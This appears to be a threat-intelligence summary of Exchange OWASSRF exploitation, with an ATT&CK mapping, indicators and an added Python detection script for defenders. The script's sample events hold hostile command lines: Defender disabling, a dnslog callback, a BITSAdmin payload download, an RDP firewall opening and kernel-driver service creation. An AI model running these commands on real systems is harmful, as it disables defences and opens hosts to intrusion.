Sophos X-Ops observed continued exploitation of Microsoft Exchange servers through the OWASSRF chain, which combines CVE-2022-41080 (an elevation-of-privilege flaw reached by server-side request forgery through the OWA front end) with CVE-2022-41082 (remote code execution via Exchange PowerShell remoting) to gain ProxyShell/ProxyNotShell-style access. The activity hit high-profile targets such as Rackspace; the ransomware deployment attempts Sophos describes were blocked by patching and defender actions, and CISA guidance urging prompt remediation reflects that unpatched servers remain exposed.
Keypoints
- OWASSRF exploitation continued against Exchange servers using the same two CVEs after initial patches were released.
- The chain uses server-side request forgery through OWA to reach the Exchange PowerShell remoting back end, where CVE-2022-41082 yields remote code execution inside the IIS worker process (w3wp), the launch point for the post-exploitation activity below.
- Post-exploitation relied on encoded PowerShell spawned from w3wp, DNS-based reconnaissance with nslookup, and native or dual-use tooling (BITSAdmin, PsExec, PuTTY Link, RDP).
- Threat actors attempted to deploy ransomware, to disable security tooling including Windows Defender, and to load a kernel driver that carried a code-signing certificate.
- Indicators of compromise included several C2 IPs, a PoC script (poc.py), and dual-use tools downloaded via BITSAdmin.
- CISA urged federal agencies to apply patches and highlighted ongoing risk as unpatched Exchange servers remain exposed.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – The OWASSRF technique chains CVE-2022-41080 and CVE-2022-41082 to compromise Exchange via OWA. Quote: “The OWASSRF technique once again chains two CVEs… to achieve a ProxyShell / ProxyNotShell-style attack via OWA.”
- [T1059.001] PowerShell – Encoded PowerShell commands spawned from w3wp during post-exploitation. Quote: “encoded PowerShell commands spawning from w3wp.”
- [T1016] System Network Configuration Discovery – DNS-based reconnaissance using nslookup against a DNS logging service. Because the lookup goes to an attacker-controlled domain, it is also an out-of-band callback: the queried subdomain appears in DNS resolver logs, which makes it a simple hunt even where the host itself is not instrumented. Quote: “Used the native Windows binary ‘nslookup’ with a DNS logging service for reconnaissance.”
- [T1105] Ingress Tool Transfer – BITSAdmin used to download dual-use tools (ScreenConnect, AnyDesk) from external sites. Quote: “Leveraged BITSAdmin to download multiple dual-use agents… from 4sync[.]com, anonfiles[.]com.”
- [T1021.004] Remote Services (SSH) – Remote connection established via a renamed copy of PuTTY Link (plink), the PuTTY command-line SSH client commonly used for tunnelling. Quote: “a renamed copy of PuTTY Link, which was used to establish a remote connection.”
- [T1562.004] Impair Defenses: Disable or Modify System Firewall – Adding a Windows Firewall rule to allow inbound remote desktop traffic. Quote: “Set a rule in the Windows Advanced Firewall to allow traffic for remote desktop.”
- [T1553.002] Subvert Trust Controls: Code Signing – The kernel driver carried a code-signing certificate; a valid signature is what lets a driver past driver-signature enforcement on 64-bit Windows and makes it look legitimate to analysts. The load itself, through the Service Control Manager, is covered under T1543.003 below. Quote: “This driver file uses a code-signing certificate…”; “The Windows Service Control Manager program was executed to load this driver.”
- [T1562.001] Impair Defenses: Disable or Modify Tools – Attempts to disable antimalware/logging tools (Windows Defender) via PowerShell. Quote: “attempting to disable antimalware and logging tools… Windows Defender features.”
- [T1543.003] Create or Modify System Process: Windows Service – Creation of a service to load a kernel driver (dRVag.sys). Quote: “Windows Service Control Manager… to load this driver.”
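As an added example (not code from the Sophos post), the following Python hunts process-creation telemetry for the behaviours listed under Keypoints and MITRE Techniques: shells spawned by the IIS worker, encoded PowerShell that turns off Defender features, nslookup callbacks to a DNS logging domain, BITSAdmin transfers from the file-sharing hosts named above, firewall rules opening RDP, and kernel-driver service creation. The event records and command lines are constructed for illustration; only the domain names come from the indicators on this page, and the ATT&CK IDs follow the mapping above.

```python
"""Hunt process-creation events for the OWASSRF post-exploitation chain.

Added example, not code from the Sophos post. All sample events below are
constructed; only the domain names come from the indicators on this page.
"""
import base64
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent: str    # parent image, e.g. w3wp.exe (the IIS worker hosting OWA)
    image: str     # child image
    cmdline: str   # full command line as logged (Sysmon EID 1 / 4688 style)


# Domains named on the page; subdomains match too (dnslog.cn callbacks use random labels).
SUSPECT_DOMAINS = ("dnslog.cn", "4sync.com", "anonfiles.com")
# Interpreters that have no business being children of the Exchange IIS worker.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}


def _matches_domain(host: str) -> bool:
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in SUSPECT_DOMAINS)


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if there is none.

    PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...);
    the argument is base64 of UTF-16LE text. Other flags (-ExecutionPolicy, -File) are skipped.
    """
    for flag, arg in re.findall(r"-(\w+)\s+([A-Za-z0-9+/=]+)", cmdline):
        if not "encodedcommand".startswith(flag.lower()):
            continue
        try:
            return base64.b64decode(arg, validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            return None
    return None


def classify(ev: ProcEvent):
    """Yield (ATT&CK id, reason) for each chain behaviour visible in one event."""
    img, cmd, low = ev.image.lower(), ev.cmdline, ev.cmdline.lower()

    if ev.parent.lower() == "w3wp.exe" and img in SHELLS:
        yield "T1059.001", f"{ev.image} spawned by IIS worker w3wp.exe"

    decoded = decode_encoded_command(cmd) if img in ("powershell.exe", "pwsh.exe") else None
    if decoded is not None:
        yield "T1059.001", f"encoded PowerShell decodes to: {decoded[:60]}"
        if re.search(r"set-mppreference\s.*-disable", decoded, re.I):
            yield "T1562.001", "Defender feature disabled via Set-MpPreference"

    if img == "nslookup.exe":
        for token in cmd.split()[1:]:
            if _matches_domain(token):
                yield "T1016", f"nslookup callback to DNS logging service {token}"

    if img == "bitsadmin.exe" and "/transfer" in low:
        for host in re.findall(r"https?://([^/\s]+)", cmd):
            if _matches_domain(host.rsplit("@", 1)[-1].split(":")[0]):
                yield "T1105", f"BITSAdmin download from {host}"

    if img == "netsh.exe" and "advfirewall" in low and "add rule" in low and (
        "3389" in low or "remote desktop" in low
    ):
        yield "T1562.004", "Windows Firewall rule added to allow RDP"

    if img == "sc.exe" and re.search(r"\bcreate\b", low) and re.search(r"type=\s*kernel", low):
        yield "T1543.003", "kernel-driver service created through Service Control Manager"


def hunt(events):
    """Run every rule over the events; returns [(event_index, technique_id, reason)]."""
    return [(i, tid, why) for i, ev in enumerate(events) for tid, why in classify(ev)]


def techniques_seen(events):
    """Sorted, de-duplicated ATT&CK IDs observed across the events."""
    return sorted({tid for _, tid, _ in hunt(events)})


# Constructed sample telemetry: five malicious events modelled on the page, two benign ones.
_ENC = base64.b64encode("Set-MpPreference -DisableRealtimeMonitoring $true".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    ProcEvent("w3wp.exe", "powershell.exe", f"powershell.exe -nop -w hidden -enc {_ENC}"),
    ProcEvent("powershell.exe", "nslookup.exe", "nslookup a1b2c3.dnslog.cn"),
    ProcEvent("cmd.exe", "bitsadmin.exe",
              "bitsadmin /transfer job /download /priority high "
              "https://www.4sync.com/web/dl/ga.exe C:\\Users\\Public\\ga.exe"),
    ProcEvent("cmd.exe", "netsh.exe",
              'netsh advfirewall firewall add rule name="Remote Desktop" dir=in '
              "protocol=TCP localport=3389 action=allow"),
    ProcEvent("cmd.exe", "sc.exe", "sc create drvsvc type= kernel binPath= C:\\Windows\\Temp\\dRVag.sys"),
    ProcEvent("explorer.exe", "powershell.exe", "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"),
    ProcEvent("svchost.exe", "nslookup.exe", "nslookup mail.contoso.com"),
]

if __name__ == "__main__":
    for i, tid, why in hunt(SAMPLE_EVENTS):
        print(f"event {i}: {tid} - {why}")
```

The rules are deliberately behavioural rather than hash- or IP-based: the w3wp parent relationship, the decoded Set-MpPreference call, the callback domain and the `type= kernel` service creation survive a change of C2 infrastructure, while the two benign events (an administrator's scheduled script and an ordinary lookup) produce no hits. Feed it real Sysmon or 4688 data by mapping ParentImage, Image and CommandLine onto ProcEvent.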
Indicators of Compromise
- [IP] C2 addresses – 179.60.149[.]28, 141.98.9[.]4, and 5 more items
- [Domain] DNS logging domains used in recon – dnslog[.]cn, and 1 more domain
- [File] PoC and tooling – poc.py, sophos_k.exe
- [File] Kernel driver/file names – dRVag.sys, komar65.dll
- [File] Dual-use assets downloaded via BITSAdmin – ga.exe and an executable whose name contains “baidu” (only name fragments are given)
- [Domain] Download hosts for remote-access tooling – 4sync[.]com, anonfiles[.]com
Read more: https://news.sophos.com/en-us/2023/03/15/observing-owassrf-exchange-exploitation-still/